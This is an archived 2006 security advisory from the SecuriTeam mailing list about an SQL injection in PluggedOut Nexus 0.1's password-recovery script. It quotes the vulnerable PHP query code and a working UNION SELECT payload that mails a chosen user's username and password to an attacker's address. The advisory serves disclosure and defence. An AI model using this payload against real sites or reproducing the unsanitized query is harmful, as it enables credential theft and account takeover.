[UNIX] PluggedOut Nexus SQL injection
- From: SecuriTeam <support@xxxxxxxxxxxxxx>
- Date: 5 Mar 2006 14:46:16 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
- - - - - - - - -
PluggedOut Nexus SQL injection
<http://www.pluggedout.com> Nexus is "an open source script you can run
on your web server to give you a community based website where people can
register, search each others interests, and communicate with one another
either through a private messaging system, or via chat". An SQL injection
vulnerability in the Nexus PluggedOut product allows remote attackers to
gain access to the hashed password of any user they desire.
* PluggedOut Nexus version 0.1
The forgotten_password.php file doesn't not properly sanitize the 'email'
parameter, allowing remote attackers to inject arbitrary SQL into the
file's password recovery SQL statement.
The following lines in "forgotten_password.php" :
$con = db_connect();
$sql = "SELECT cUsername,cPassword,cEMailPrivate FROM nexus_users
$result = mysql_query($sql,$con);
$row = mysql_fetch_array($result);
$from = $site_admin_email;
$to = $row["cEMailPrivate"];
$subject = "Reminder Username/Password from
$body = "This email has been sent following a
request for a reminder username/password in the
."Your account details are as follows;\n"
." Username : ".$row["cUsername"]."\n"
." Password : ".$row["cPassword"]."\n\n"
."If you did not request this reminder
message, please contact the ".$site_long_name." administrator
Insert the following SQL statement into the email address
hamidnetworksecurityteam' union select
cUsername,cPassword,'ATTACKER@xxxxxxxxxxxxx' from nexus_users WHERE
nUserId=1 and '1'='1
Which will cause the ATTACKER@xxxxxxxxxxxxx to receive an email that
contains the username & password for userID=1.
The original article can be found at: <http://hamid.ir/security/>
The information has been provided by <mailto:het_ebadi@xxxxxxxxx> h e.
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Prev by Date: [UNIX] Gregarius XSS and SQL Injection Vulnerabilities
- Next by Date: [EXPL] LibTiff Buffer Overflow Exploit
- Previous by thread: [UNIX] Gregarius XSS and SQL Injection Vulnerabilities
- Next by thread: [EXPL] LibTiff Buffer Overflow Exploit